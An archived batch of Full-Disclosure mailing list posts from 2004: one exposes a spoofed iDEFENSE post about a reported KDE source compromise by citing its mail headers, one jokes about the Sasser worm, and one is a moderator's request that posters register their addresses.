Please note that this is yet another troll: Received: from securityfocus.bugtraq.org ([199.173.12.66]) by netsys.com (8.11.6p2-2003-09-16/8.11.6) with SMTP id i4A0od422402 for [EMAIL PROTECTED]; Sun, 9 May 2004 20:50:46 -0400 (EDT) A hint: email from iDEFENSE employees typically comes from machines with reverse and forward DNS in the idefense.com DNS zone (funny how it works that way). While I don't mind spoofed posts, these are getting very lame. Kurt Seifried, [EMAIL PROTECTED] A15B BEE5 B391 B9AD B0EF AEB0 AD63 0B4E AD56 E574 http://seifried.org/security/ - Original Message - From: Richard Johnson [EMAIL PROTECTED] To: Alexander [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Sunday, May 09, 2004 19:41 Subject: Re: [Full-Disclosure] KDE was hacked If you had been subscribed to our iAlert services, you would have known about this specific hacker threat months in advance, and known that only the binary releases of KDE are safe to use. As an agent of an commercial intelligence agency, I cannot stress how important it is for all commercial entities to subscribe to commercial intelligence services. We know about hacking before it happens! On Fri, May 07, 2004 at 10:48:06PM +0400, Alexander wrote: 2004/05/03 13:50:28 KDE was hacked by Russian hacker More information (In Russian) http://www.securitylab.ru/45100.html Diff for /kdenetwork/kppp/connect.cpp between version 1.175 and 1.176: http://webcvs.kde.org/cgi-bin/cvsweb.cgi/kdenetwork/kppp/connect.cpp.diff?r1 =1.175r2=1.176f=h ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html -- Richard Johnson, CISSP Senior Security Researcher iDEFENSE Inc. [EMAIL PROTECTED] Get paid for security stuff!! http://www.idefense.com/contributor.html and become part of our reearch team! http://idefense.bugtraq.org/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Victory day - Sasser surrenders
You're kidding there, right? no the person who made the statement below actually oversaw all the details of the transfer! . ~ And a few months ago, a large amount of money was transfered to his account from a couple of popular antivirus vendors :) Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Administrivreality: Please register email addresses
I'd like to ask everyone who continues to post without registering or posting from an unregistered addresses to please register. You are causing needless work for John and I and you are introducing delays in your messages obviously since we have to manually approve the message. We are forced to block posts from non-registered members in an attempt to stop spam, etc. so everything hits the moderation queue. We do make an attempt to cover the list 24x7 but there are many times when we're both occupied with real work. You may not be aware that you can add multiple addresses and turn off mail delivery to any or all depending on what you require but will permit you to post at will. Thanks Len ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
